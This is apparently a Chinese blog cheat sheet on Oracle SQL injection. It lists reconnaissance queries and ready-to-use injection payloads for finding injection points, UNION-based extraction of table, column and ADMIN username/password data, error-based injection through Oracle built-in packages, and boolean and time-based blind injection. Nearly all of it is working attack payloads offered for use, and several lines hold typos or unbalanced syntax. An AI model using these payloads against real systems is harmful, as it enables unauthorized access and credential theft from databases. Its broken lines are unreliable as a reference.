'oracle数据库注入'

发表于 更新于 分类于 阅读次数:

常用查询语句

1
2
3
4
5
6
7
8
9
10
11
12
13
1 当前用户权限 (select * from session_roles)
2 当前数据库版本 ( select banner from sys.v_$version where rownum=1)
3 服务器出口IP (用utl_http.request 可以实现)
4 服务器监听IP (select utl_inaddr.get_host_address from dual)
5 服务器操作系统 (select member from v$logfile where rownum=1)
6 服务器sid (select instance_name from v$instance)
7 当前连接用户 (select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual)
8 定位文件(select name from V$datafile)
9 当前用户 (SELECT user FROM dual)
10 列出所有用户(select username from all_users order by username)
11 列出数据库(select distinct owner from all_tables)
12 列出表名(select table_name from all_tables)(select owner,table_name from all_tables)
13 查询所有字段名(select column_name from all_tab_columns where table_name='ADMIN')

判断注入点

and 1=1 – 恢复正常
and 1=2 – 正常显示,出现显示位

联合查询

order by 定字段
order by 1 –
oracle数据库自带dual表,from语句后接dual
and 1=2 union select null,null… from dual 一个一个判断字段类型
and 1=2 union select ‘null’,null… from dual 报错则为数字型
and 1=2 union select null,‘null’… from dual 正常则为字符型
确定回显位
’ and 1=2 union select 1,‘2’ from dual –
查询库名
union select 1,(select owner from all_tables where rownum=1) from dual
查询第二个库名
union select 1,(select owner from all_tables where rownum=1 and owner<>‘SYS’) from dual
查询第一个表
union select 1,(select table_name from user_tables where rownum=1) from dual
查询第二个表名
union select 1,(select table_name from user_tables where rownum=1and table_name<>‘ADMIN’) from dual
查询ADMIN第一个字段名
union select 1,(select column_name from user_tab_columns where table_name=‘ADMIN’ and rownum=1) from dual
查询ADMIN第二个字段名
union select 1,(select column_name from user_tab_columns where table_name=‘ADMIN’ and column_name<>‘ID’ and rownum=1) from dual
查询字段内容
union select 1,(concat(username,password) from ADMIN) from dual (两个以上使用||管道符)
union select 1,(select username from ADMIN),(select password from ADMIN) from dual

报错注入

and 1=utl_inaddr.get_host_name((select user from dual))–
1=ctxsys.drithsx.sn(1,(select user from dual)) –
and (select upper(XMLType(chr(60)%7c%7cchr(58)%7c%7c(select user from dual)%7c%7cchr(62))) from dual) is not null –
and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null –
and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null –
and (select dbms_xdb_version.uncheckout((select user from dual)) from dual) is not null –
and (SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual) is not null –
and 1=ordsys.ord_dicom.getmappingxpath((select user from dual),user,user)–
and 1=(select decode(substr(user,1,1),‘S’,(1/0),0) from dual) –

布尔盲注

and 1=(select decode(user,‘SYSTEM’,1,0) from dual) 查询当前用户是否为SYSTEM,如果是则返回1,不是则返回0
and 1=(select decode(substr(use,1,1),‘S’,1,0)from dual)
and 1=(select decode(substr(use,2,1),‘Y’,1,0)from dual)

and (select count(table_name)from user_tables) >1
and (select length(table_name) from user_tables where rownum=1)>5
and ascii(substr((select table_name from user_tables where rownum=1),1,1))>80
and ascii(substr((select length(column_name) from user_tab_columns where table_name=xxx and rownum=1)),1,1))>10
and ascii(substr((select (column_name) from user_tab_columns where table_name=xxx and rownum=1)),1,1))>10

延时盲注

dbms_pipe.receive_message(‘RDS’,3)
A’ and 1=(select decode(substr(user,1,1),‘A’,DBMS_PIPE.RECEIVE_MESSAGE(‘RDS’,3) ,0) from dual) and ‘1’='1